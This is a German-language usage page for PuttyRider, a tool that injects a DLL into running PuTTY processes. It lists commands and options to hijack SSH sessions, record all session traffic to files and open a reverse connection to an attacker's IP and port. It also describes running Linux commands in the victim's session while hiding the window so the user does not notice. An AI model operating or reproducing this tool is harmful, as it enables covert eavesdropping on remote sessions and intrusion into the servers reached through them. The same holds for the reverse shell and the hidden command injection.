
Putty-Sitzungen kapern, um Gespräche abzuhören und Linux-Befehle einzuschleusen.
Kapern Sie Putty-Sitzungen, um die Kommunikation zu belauschen und Linux-Befehle einzuschleusen.
Listet vorhandene Putty-Prozesse und deren Status (injiziert / nicht injiziert) auf.
PuttyRider.exe -l
Injiziert die DLL in das erste gefundene putty.exe und initiiert eine Rückverbindung von der DLL zu meiner IP:Port, dann beendet PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
Wird im Hintergrund ausgeführt und wartet auf neue Putty-Prozesse. Injiziert in jedes neue putty.exe und schreibt alle Gespräche in lokale Dateien.
PuttyRider.exe -w -f
Entfernt PuttyRider.dll aus allen Putty-Prozessen, in die sie bereits injiziert wurde. (Vergiss nicht, PuttyRider.exe zu beenden, wenn es im -w-Modus läuft, sonst wird es erneut injizieren.)
PuttyRider.exe -x
Betriebsmodi:
-l Listet die laufenden Putty-Prozesse und ihre Verbindungen auf
-w Injiziert in alle bestehenden Putty-Sitzungen und wartet auf neue Sitzungen,
um auch dort zu injizieren
-p PID Injiziert nur in die bestehende Putty-Sitzung, die durch PID identifiziert wird.
Wenn PID==0, wird in die erste gefundene Putty injiziert
-x Bereinigen. Entfernt die DLL aus allen laufenden Putty-Instanzen
-d Debug-Modus. Funktioniert nur mit -p-Modus
-c CMD Führt nach erfolgreicher Injektion automatisch einen Linux-Befehl aus
PuttyRider entfernt nachgestellte Leerzeichen und das Zeichen '&' aus CMD
PuttyRider fügt hinzu: " 1>/dev/null 2>/dev/null &" an CMD
-h Diese Hilfe anzeigen
Ausgabemodi:
-f Schreibt die gesamte Putty-Kommunikation in eine Datei im lokalen Verzeichnis.
Der Dateiname enthält die PID des aktuellen putty.exe
-r IP:PORT Initiiert eine Rückverbindung zur angegebenen Maschine und
startet eine interaktive Sitzung.
Interaktive Befehle (nach Erhalt einer Rückverbindung):
!status Überprüft, ob das Putty-Fenster mit Benutzereingaben verbunden ist
!discon Trennt das Haupt-Putty-Fenster, sodass es nichts mehr anzeigt
Dies ist nützlich, um Befehle zu senden, ohne dass der Benutzer es bemerkt
!recon Verbinde das Putty-Fenster wieder mit dem normalen Betriebsmodus
CMD Linux-Shell-Befehle
!exit Beendet diese Verbindung
!help Zeigt Hilfe für die Client-Verbindung an
Verwenden Sie die Visual Studio-Eingabeaufforderung:
nmake main dll
Dank an Brett Moore von Insomnia Security für seinen Proof-of-Concept PuttyHijack